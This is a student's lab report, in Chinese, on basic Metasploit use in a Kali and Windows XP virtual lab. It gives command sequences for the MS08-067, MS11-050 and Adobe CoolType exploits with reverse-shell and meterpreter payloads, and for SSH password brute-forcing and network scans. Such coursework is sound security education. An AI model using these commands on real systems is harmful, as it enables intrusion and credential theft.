20145238-荆玉茗《网络对抗技术》MSF基础应用

20145238荆玉茗-《网络攻防》-MSF基础应用

实践过程

MS08_067漏洞渗透攻击实践（主动攻击）

实验工具：

• kali&windows xp
• 将xp的网络设为NAT模式，再重新分配其ip地址与kali在同一网段，可以看到两台虚拟机可以ping通。
  

MS08_067远程漏洞攻击

• 打开msf监听

• 查找关于ms08_067的渗透模块
  

• 使用它有的这个exploit/windows/smb/ms08_067_netapi

• 显示攻击载荷，可以用这个shell_bind_tcp
  
  

• 用show targets看一下可以被攻击的靶机的操作系统
• 使用set payload generic/shell_reverse_tcp设置攻击有效载荷。

• 查看当前设置，要将RHOST设置为XP的IP；将LHOST设为kali的IP
  set LHOST "kali Ip" set RHOST "Win xp Ip"
  

• 之后exploit可以获取其shell

回到ms08_067_netapi模块界面

• 这次将payload设为meterpreterset payload windows/meterpreter/reverse_tcp
• show options
• exploit
  同样可以获取靶机权限
  

IE浏览器渗透攻击——MS11050安全漏洞（针对浏览器）

实验工具：

• kali&windows xp（使用浏览器为IE7）
• xp的ip地址为192.168.228.130

实验步骤：

• 在kali中开启msfconsole
• 进入该漏洞use windows/browser/ms11_050_mshtml_cobjectelement

• 可查看信息info以及目标浏览器targets
  

• 设置meterpreter载荷set payload windows/meterpreter/reverse_tcp

• show options（将LHOST设为kali的IP、set LPORT xxx set URIPATH xxx）
  

• 完成exploitXP访问底下的网址
  
  

• 此时kali中session已创建
  

• 使用命令sessions -i 1开始连接，并成功得到shell
  

Adobe阅读器渗透攻击

实验工具：

• kali&Win xp attacker
• 均设为NAT模式，确保能够ping通。
• 打开kali中的隐藏文件
  

实验步骤：

• 在kali终端中开启msfconsole
• 进入该漏洞use exploit/windows/fileformat/adobe_cooltype_sing
• 设置攻击有效载荷set payload windows/meterpreter/reverse_tcp
• show options
  

set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx

• 设置相关信息
  

• 生成其pdf，将pdf拷贝到靶机中
  

• 使用命令exploit开始攻击，在xp中打开pdf。
  此时kali中可以看见
  已成功夺权
  

• 看看靶机里的tcp连接
  

应用辅助模块

• 使用show auxiliary查看辅助模块
  

• 我首先选择了这个漏洞，百度之后是进行远程ssl账号口令的破解。
  首先使用use auxiliary/scanner/ssh/ssh_login
  

• 查看其配置信息（还配置了pass.txt，和user.txt）
  

• 但是run之后一直出错
  

（百度说Windows下msf安装好以后，直接把生成好的pass.txt和user.txt放到X:\Program Files\Metasploit\Framework3\msf3\目录下，直接放到c:\下面不行 只能放到msf3目录下，我以为直接把生成的文件拷贝过去就行，首先我没找到生成的文件...然后我把ip改为kali的，还是报错）

• 还是看一下scanner/http/ssl
  

• 我们更改了目标主机设为同一网段的，再次扫描...未果
  又更改了其线程...仍未果
  

• 还是做最容易的nmap扫面，看看其开放端口吧
  

• 还是不太甘心，又做了一下arp_sweep
  填好其设置信息以后使用run 开始扫描。可看到连接情况。
  

实验后回答问题

（1）用自己的话解释什么是exploit,payload,encode.

• exploit：就是发起渗透攻击，当你可以获得靶机shell或者做一些夺权的准备之后的最后一个run。
• payload就是我们在做渗透攻击中用到的shellcode，可以破坏程序正常运行的代码。
• encode伪装病毒的一种手段——编码

实验总结与体会

通过本次实验，我首先掌握了通过msf如何查看各种各样的安全漏洞，再通过一个漏洞的分类进行攻击。大致步骤为：

• 确定你想尝试的漏洞show auxiliary
• 搜索该漏洞的模块search xxx（可以看到分别表示的模块类型、目标平台、目标服务、模块名字）
• show payloads可查看攻击载荷的类型，选择运行后门
• show options查看配设渗透攻击所需要的配置选项。yes为必须配设的通过set xxx xxxx来配设
• 重要的一点是这些漏洞都非常具有针对性、所以一定要show targets来看看相应的受害者是啥
• 配置完各个选项以后再show options确认一下
• 之后就可以exploit发起进攻。

本次实验难度方面不是特别大，主要考察你虚拟机能不能行，哎，一直在百分之93的状态下做完了实验，最后也分不清0 8 和o 了。。。